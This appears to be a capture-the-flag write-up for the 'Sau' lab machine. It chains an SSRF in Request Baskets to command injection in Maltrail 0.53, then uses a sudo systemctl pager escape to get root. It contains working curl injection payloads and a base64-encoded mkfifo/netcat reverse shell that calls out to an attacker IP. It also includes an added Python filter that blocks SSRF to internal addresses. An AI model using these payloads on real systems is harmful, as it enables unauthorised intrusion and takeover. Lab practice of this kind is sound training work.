SAU

Scanning

sudo nmap -A -T4 -v 10.10.11.224 -oA scans/scan

Found ports

55555 - http

image

It’s one of those request-capture websites, similar to requestbin: you create a basket and it records whatever HTTP requests get sent to it.

image

Creating a basket and clicking around, we find a “Forward URL” setting. That makes me think SSRF.

Let's see if Request Baskets has any PoCs we can use.

searchsploit Request Baskets
image

YUP SSRF.

searchsploit -m 51675
51675.sh

Looking at line 30:

PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";

Looks like it’s just setting forward_url to the attacker's server and proxying the response back. Let's confirm the vuln manually.

echo '<html><body><h1>Vuln confirmed!</h1></body></html>' > index.html
python3 -m http.server 80

Now we set forward_url to our server, and set both proxy_response and expand_path to true.

image

Now, visiting the basket we see:

image

In our web server's log we can see the request came from the target box itself, not from our machine.

image

Let's enumerate further by pointing the forward URL at the box itself, 127.0.0.1.

image

Now visiting the bin:

image

We see Maltrail is running.

💡
Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails.
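The root cause of the hop above is that the basket's forward_url is accepted as-is, so it can be aimed at 127.0.0.1 and the proxy happily fetches internal services. As an added example (not code from Request Baskets or from this writeup), here is a server-side check that rejects forward URLs pointing at the host itself or its internal network, including the integer, hex and IPv4-mapped spellings of loopback; the resolver is injectable so the check can be tested offline, and the hostnames and addresses in the test are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Names that always mean "this machine", whatever DNS says.
BLOCKED_HOSTNAMES = {"localhost", "localhost.localdomain", "ip6-localhost"}


def _parse_ip_literal(host):
    """Return an ip_address for dotted/colon literals and for bare integer
    or hex forms such as 2130706433 or 0x7f000001 (both are 127.0.0.1)."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))
    except (ValueError, OverflowError):
        return None


def _is_internal(ip):
    # Unwrap IPv4-mapped IPv6 (::ffff:127.0.0.1) so the IPv4 rules apply.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # Loopback, RFC 1918 / ULA, link-local (169.254.x, where cloud metadata
    # lives), 0.0.0.0, multicast and reserved ranges are all off-limits.
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)


def _resolve(host):
    # Real DNS lookup (assumed default); callers can inject a fake for tests.
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def forward_url_is_safe(url, resolve=_resolve):
    """True only if url is http(s) and every address it maps to is public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname  # lower-cased, IPv6 brackets already stripped
    if not host or host in BLOCKED_HOSTNAMES:
        return False
    ip = _parse_ip_literal(host)
    if ip is not None:
        return not _is_internal(ip)
    try:
        addrs = resolve(host)
    except (socket.gaierror, OSError):
        return False  # fail closed on names that do not resolve
    # A name passes only if *all* of its records are public. DNS rebinding can
    # still swap the answer between this check and the connect, so the same
    # test should be repeated on the address actually dialled.
    return bool(addrs) and not any(_is_internal(ipaddress.ip_address(a)) for a in addrs)
```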

Maybe this version has a vuln?

searchsploit maltrail 0.53
image

This looks promising.

searchsploit -m 51676
51676.py

Line 29:

command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"

Looks like a command injection vulnerability in the username parameter: the expected value is terminated with ; and a further command is chained after it.

Let's exploit this manually.

;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`

Let's run netcat to verify we can execute code.

nc -lvnp 8080

I made a new basket called ‘ssrf’; it also needs to point at localhost so we can reach the Maltrail login endpoint. The target URL:

http://10.10.11.224:55555/ssrf/login
echo 'nc 10.10.14.32 8080' | base64
bmMgMTAuMTAuMTQuMzIgODA4MAo=
curl 'http://10.10.11.224:55555/ssrf/login' --data 'username=;`echo+\"bmMgMTAuMTAuMTQuMzIgODA4MAo=\"+|+base64+-d+|+sh`'

Set up the listener

nc -lvp 8080
image

Confirmed we can execute code! Let’s stick a revshell into the payload.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.32 8080 >/tmp/f' | base64
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjMyIDgwODAgPi90bXAvZgo=
curl 'http://10.10.11.224:55555/ssrf/login' --data 'username=;`echo+\"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjMyIDgwODAgPi90bXAvZgo=\"+|+base64+-d+|+sh`'

We got a shell!

image

Stabilize

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now let's check for privesc.

puma@sau:/opt/maltrail$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
puma@sau:/opt/maltrail$

Easy as that?

💡
Before using the pager I added my ssh key to the authorized keys on the box to ensure the pager wouldn’t break my terminal.

Should be as simple as typing !sh once we open the pager with sudo.

sudo /usr/bin/systemctl status trail.service
image

That’s root!